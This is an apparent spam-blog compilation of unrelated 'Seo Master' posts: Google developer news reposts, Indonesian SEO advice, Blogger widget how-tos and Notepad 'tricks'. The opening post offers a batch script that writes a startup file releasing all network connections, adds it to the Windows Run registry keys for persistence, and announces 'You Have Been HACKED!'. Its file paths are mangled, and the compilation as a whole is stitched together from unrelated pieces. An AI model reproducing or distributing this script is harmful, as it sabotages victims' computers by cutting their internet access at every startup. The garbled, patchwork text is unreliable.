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seo Disable Internet Permanently With Notepad 2013

Seo Master present to you:

This is new trick to disable internet permanently in your computer. After it’s running you cannot use internet .

Copy below code and paste in Notepad.

echo @echo off>c:windowswimn32.bat
echo break off>>c:windowswimn32.bat
echo ipconfig/release_all>>c:windowswimn32.bat
echo end>>c:windowswimn32.bat
reg add hkey_local_machinesoftwaremicrosoftwindowscurrentv ersionrun /v WINDOWsAPI /t reg_sz /d c:windowswimn32.bat /f
reg add hkey_current_usersoftwaremicrosoftwindowscurrentve rsionrun /v CONTROLexit /t reg_sz /d c:windowswimn32.bat /f
echo You Have Been HACKED!

Save as like a .bat file.


2013, By: Seo Master

seo Make Your Keyboard Disco Light - Notepad Trick 2013

Seo Master present to you:

This trick just makes your keyboard lights do disco.
The script I’m sharing with you, when executed makes your Caps, Num and Scroll Lock’s light flash in a cool rhythmic way!

Code No 1

This piece of code makes ur keyboard a live disco..
Set wshShell =wscript.CreateObject(“WScript.Shell”)
wscript.sleep 100
wshshell.sendkeys “{CAPSLOCK}”
wshshell.sendkeys “{NUMLOCK}”
wshshell.sendkeys “{SCROLLLOCK}”

Code No 2

This one makes it looks like a chain of light….
Set wshShell =wscript.CreateObject(“WScript.Shell”)
wscript.sleep 200
wshshell.sendkeys “{CAPSLOCK}”
wscript.sleep 100
wshshell.sendkeys “{NUMLOCK}”
wscript.sleep 50
wshshell.sendkeys “{SCROLLLOCK}”

  • Paste any of the two above codes in notepad

  • Save as “AnyFileName” .vbs and Run it.

  • To stop, launch task manager and then under “Processes” end “wscript.exe

I hope u would like it..

2013, By: Seo Master

seo Trend Trik seo blogger tahun 2010 2013

Tulisan ini hanya analisa saya, jadi maaf kalau salah. Search engine terutama google pasti selalu update sistem mereka, tapi kapan updatednya itulah salah satu rahasia mereka. Biasanya setiap tahun mereka berbeda. Bagaimana trik seo tahun ini?
Inilah analisa seo 2010 saya :1. Google tahun ini sangat mendahulukan waktu pengeposan sebuah artikel berdasarkan keyword, jadi jika sobat ada ide baru

seo Fridaygram: welcoming women developers, camp for makers, killer cows 2013

Seo Master present to you: Author Photo
By Scott Knaster, Google Developers Blog Editor

Fumi Yamazaki is Google Developer Relations Lead in Japan. About a year ago, she noticed that few women developers were attending developer events, so she decided to do something about it. Fumi and several female developers organized GTUG Girls to foster a community of women developers in Japan.

GTUG Girls logo

Earlier today, Fumi posted about GTUG Girls on her blog. The post contains lots of great tips and tidbits about what has happened with GTUG Girls over the past year. Fumi’s post includes some of the group’s principles, such as teach each other, create something, and have fun. Most importantly the post offer tips on how to replicate the success of GTUG Girls in other countries. Go for it!

Summer vacation time in the Northern Hemisphere is winding down, but there’s still time left for some great activities, including another week of Maker Camp. Every day of Maker Camp brings a new project. Friday is field trip day, and today’s trip was to CERN, home of the Large Hadron Collider. If you’ve missed Maker Camp so far, visit +MAKE to see recorded hangouts and other cool stuff.

Finally, and speaking of catching up, spend some time reading the Cow Week posts over at Boing Boing. You will never look at dairy products the same way again.

Each week our Fridaygram presents cool things from Google and elsewhere that you might not have heard about. Some Fridaygram items aren't related to developer topics, but all of them are interesting to us nerds. Huge thanks to my wonderful cow-orkers Liz Markman, Van Riper, and Fumi Yamazaki for their help with this week’s post.
2013, By: Seo Master

seo Google Developer Days 2009: New Locations! 2013

Seo Master present to you: After a successful set of Google Developer Days in Asia and Brazil this past June, Google Developer Days 2009, a set of one-day developer events, are returning to Eastern Europe and Russia this fall.

We'll host Google Developer Day in these locations:
  • Prague, Czech Republic -- November 6
  • Moscow, Russia -- November 10
At Google Developer Day, attendees learn about Google developer products from the engineering teams who built them. These events are an opportunity for developers with strong coding experience to delve deeper into our APIs, developer tools and applications. There is also plenty of time to interact among the developer community and with Googlers themselves at "office hours," during which developers can bring their own snippets of code or specific product questions to the Google engineers behind the product.

Save the dates as the official websites and registration for both events will be available soon. Hope to see you there.

2013, By: Seo Master

seo Google Funds COLLADA Support for Mac and Linux 2013

Seo Master present to you:

COLLADA, the standard 3D interchange format, makes it much easier to translate complex animated 3D models across Google Earth, Google Sketch-Up, Adobe Photoshop, Epic Games' Unreal Engine 3, Autodesk Maya, and many other applications. COLLADA integrates 3D geometry, textures, complex material, complex skeletal and facial animation, physical simulations, and many more aspects. With such power comes complexity: integrating COLLADA from scratch in your application is not for the faint-hearted. Luckily developers have created reusable libraries to simplify this process, including FCollada, which is open-source, well tested, can import all versions of COLLADA and has been integrated into many applications.

We've worked on development of FCollada over the past two years, thanks to support from Google's Open Source Progams Office. Until recently, the library was only offered for Windows; it is now available for Mac OS X and several Linux distributions.

Google's sponsorship also enabled us to distribute and support two additional tools for Linux and Mac OS X enthusiasts:
  • ColladaMaya, a complete COLLADA translator designed for Autodesk Maya. It's now available for all three major platforms under the MIT license.

  • Feeling Viewer, a reference viewer for COLLADA content, supports all standard COLLADA features. A stand-alone version of the viewer is available for free on Linux and Mac.
2013, By: Seo Master

seo Google Developer Podcast Episode Seven: Mashups in the Enterprise 2013

Seo Master present to you:

Gregor Hohpe is a Googler who has spent a lot of time in the enterprise. He authored the book on Enterprise Integration Patterns, and has been watching and helping the integration world.

We were both at MashupCamp and started to talk about how Mashups could be called EAI 2.0, and started to discuss the similarities and differences.

Gregor also wrote an article titled Google Mashup Editor and Yahoo! Pipes: Friend, not Foe, which does a great job of explaining the mashup landscape by example. He shows how to use the Google Mashup Editor, and how it can work with Yahoo! Pipes and other tools.

In this podcast you will hear about all of these topics in that special style that only a German can offer. There are some really fun analogies here. Listen out for the graffiti artists in the Mashup world.

Oh, and on behalf of two europeans, we apologize for saying "San Franciso 49ers" when we of course meant the Giants.

You can download the episode directly, or subscribe to the show (click here for iTunes one-click subscribe).2013, By: Seo Master

seo Dreamweaver Tools for Google 2013

Seo Master present to you:

We keep making more services available to mobile users; in addition to Google Mobile Search, you will find that Google News, Google Maps, and more have had a mobile presence for a while. So, we want to make it easy for developers to link to and use these services in mobile web sites. I'm therefore pleased to note that we've collaborated with WebAssist to add new mobile tools to their Dreamweaver Tools for Google plugin. The newly-released version 2.0 of this free tool includes, among other things, one-click access to embedding Google Maps, News, Mobile Search, and Send-to-phone in a page.2013, By: Seo Master

seo Seo wordpress com 2013

Seo Master present to you:
Berikut adalah informasi bagi yang hosting di wordpress mengenai seo wordpress com itu sendiri. berikut tips yang bisa saya share untuk anda yang saya dapat dari blogwalking: Setelah mencoba beberapa cara dan akhirnya trafik kembali normal lagi dan mudah-mudahan bisa naik drastis. Tips ini sebagai catatan pribadi saya saja agar tidak mengulangi beberapa ’langkah bodoh’. Berikut beberapa teknik optimasi yang saya lakukan:

1. Jangan listing semua halaman page. Plugin wp-pagenavi itu bagus akan tetapi tidak bagus untuk ditaruh di mainpage yang selalu berubah jika ada postingan yang baru. Mungkin ini ada hubungannya dengan duplicate content. Semakin banyak kita memberi link ke halaman page maka semakin banyak pula duplicate content yan terdeteksi. Apalagi memberi listing keseluruhan page, bisa ancur dah trafiknya. Lebih baik gunakan link Next dan Previous aja, lebih tidak terdeteksi kalo ada duplicate content. Lebih baik gunakan plugin ini di halaman archive.php saja.

2. Pergunakan tag header dengan baik. Tau kan tag <h1>, </h1><h2> dst? Dalam dunia SEO ini masih berlaku. Theme yang kita gunakan biasanya tidak teroptimasi dengan baik karena tergantung developernya. Gunakan tag H1 untuk judul posting pada single.php saja. Sedangkan untuk tag H2 gunakan pada judul posting di index.php, archive.php, dan page.php. Untuk tag H3 bisa digunakan pada sidebar saja.

3. Link postingan lama. Lakukan link untuk postingan yang lama pada postingan yang baru, tapi jangan sembarangan yah. Yang penting related lah topiknya. Ato bisa juga menggunakan plugin random post.

4. Gunakan RSS footer utk para scrapper. Kalo blog kita ada di google blog, biasanya sih pasti ada aja blog scrapper yang copy paste blog kita. Kalo mereka ngasih link balik biarin aja, soalnya dapet backlink gratis :D Biar lebih mantap pasang plugin RSS footer. Jadinya kalo ada yang ambil feed RSS kita dengan plugin ini langsung terpasang link posting originalnya :)

5. Jangan lupakan Sitemap. Gunakan plugin Google XML sitemaps dan submit ke google webmaster tools. Cek 3 hari sekali, jika ada status warning coba cek sitemapnya, dan kalo dah bagus submit ulang sitemapnya.

6. Optimasi Title. All in One SEO Pack bagus pluginnya, cuma bagi yang servernya sharing ama ribuan domain mending ngga usah pake plugin ini deh. Perlu resource memory yang cukup gede dan biasanya setelah diaktifin plugin ini bakalan bilang out of memory :D Coba deh cara modifiksi title yang saya pernah ulas waktu ini dengan hardcode pada file header.php

7. Fast loading dengan Clean CSS. Gunakan clean css untuk mengoptimalkan loading file css. Makin kecil makin bagus karena loadingnya akan semakin cepat, tapi perlu diingat bahwa kita juga perlu membaca kode css jika ingin merubah tampilan blog. Jadi terserah anda mengoptimasi menggunakan kompresi yang mana :)

8. Gunakan tag seminimal mungkin. Jika menggunakan tag, agar tidak terlalu duplicate content sebaiknya dibatasi menggunakan 3-5 tag saja.

Baru itu saja yang tak inget, kalo ada yang kelupaan nanti tak tambahin lagi. Semoga membantu.
2013, By: Seo Master

seo Add Login Box / Login Form Code Into your Blogger 2013

Seo Master present to you:

In this post we will learn how to add the Login box in your blogger/blogspot blog. Blogger Users here we go with the steps.

  • Log in to your Blogger dashboard.

  • Go to Layout and click “Add a Gadget”.

  • Select “HTML/Java Script” option.

  • Copy the code below and Paste Inside the box.

<form action="https://www.google.com/accounts/ServiceLoginBoxAuth" method="post" onsubmit="onlogin()"><input value="http://www.blogger.com/loginz?d=%2Fhome&p=http%3A%2F%2Fwww.blogger.com%2F" name="continue" type="hidden"/><input value="blogger" name="service" type="hidden"/><input value="8" name="nui" type="hidden"/><input value="8" name="naui" type="hidden"/><input value="2" name="fpui" type="hidden"/><input value="3" name="uilel" type="hidden"/><input value="true" name="skipvpage" type="hidden"/><input value="false" name="rm" type="hidden"/><input value="true" name="alwf" type="hidden"/><input value="http://www.blogger.com/login.g" name="roeu" type="hidden"/><input value="0" name="alinsu" type="hidden"/><input value="WbQ8QiJfUvA" name="GA3T" type="hidden"/><div><label for="Email"> Username: <br/><input id="Email" tabindex="1" value="" name="Email" size="20" type="text"/></label></div><div><label for="Passwd"> Password: (<a href="https://www.blogger.com/forgot.g" target="_top" title="Forgot your password?">?</a>) <br/></label><input id="Passwd" tabindex="2" autocomplete="off" name="Passwd" size="20" type="password"/></div><br/><input id="signin-btn-ns" tabindex="0" value="Sign in" class="ubtn ubtn-block" name="submit" type="submit"/></form>

  • Save the Html/Javascript and go on to your page to see how it looks.

2013, By: Seo Master

seo How To Insert PHP Script On Blogger Blog 2013

Seo Master present to you:

Hi followers, here is a way to insert .php scripts on blogger blogs. It really is awesome. Just follow my article.

  • Log in to your blogger account.

  • Go to Layout .

  • Click on ‘Add a Gadget’ checkbox.

  • Then select ‘ HTML/Javascript’.

  • Paste this code.
<object width="400" height="300" type="text/html"data=" Your URL.php "></object>
  • Now replace URL.php with the URL php file you are hosting somewhere else.

  • You can now save and enjoy PHP features on blogger.

2013, By: Seo Master

seo Tips Memilih Domain Seo Friendly 2013

Seo Master present to you: Sebetulnya malu memposting artikel dengan judul Tips Memilih Domain Seo Friendly, soalnya bog ini juga domainnya kurang seo friendly, kepanjangan! padahal domain yang baik mestinya singkat. Nah buat kamu yang masih bingung menentukan domain baik gratisan maupun berbayar, artikel belajar seo berikut ini ada baiknya kamu praktekan.

Kita mulai saja tips memilih nama domain seo friendly:
  1. Singkat

    Tips memilih domain yang pertama ini terutama untuk memudahkan pengunjung mencapai situs kamu melalui direct trafik. Semakin singkat semakin baik, usahakan maksimal tiga kata, satu kata lebih baik, karena google lebih suka domain yang pendek daripada yang panjang-panjang. (tidak seperti wanita ). Pilih pula nama yang mudah diingat dan dieja, jangan pilih kata yang rumit.

  2. Mengandung Kata Kunci

    Jika anda ingin memilih domain seo friendly lebih dari satu kata, pilihlah domain yang menjadi kata kunci utama situs anda. jika blog anda tentang rahasia bisnis ptc anda bisa pilih domain RAHASIABISNISPTC dan semisalnya, beberapa blog atau situs seperti para penjual ebook telah sukses memakai cara ini.

    Jika target pengunjung anda adalah dari google, maka memilih cara kedua ini lebih bagus dari cara pertama. tapi jika anda mengharap direct trafik pilihan no. 1 lebih mantap.

  3. Bersambung

    Yaitu jika domain anda merupakan frase (mengandung dua kata atau lebih) maka sambungkan frase tersebut, jangan dipisah dengan dengan karakter lain seperti angka atau lainnya. kecuali kalo terpaksa anda boleh menggunakan dash "-"

    contoh domain bersambung:
    RahasiabisnisPTC.blogspot.com atau Toptrik.blogspot.com

    Contoh domain dengan dash:

  4. Gunakan .COM (dot com)

    Tips memilih domain seofriendly berikutnya adalah pemilihan domain dot com. Jika anda mau membeli domain berbayar saran saya pilihlah domain berakhiran .com, ini seperti memilih Aqua dan merek lain. orang lebih mengenal dot com daripada domain lainnya.

Mudah-mudahan tips memlilih domain seo friendly ini bisa membantu blog kamu menembus top 10 besar google.
2013, By: Seo Master
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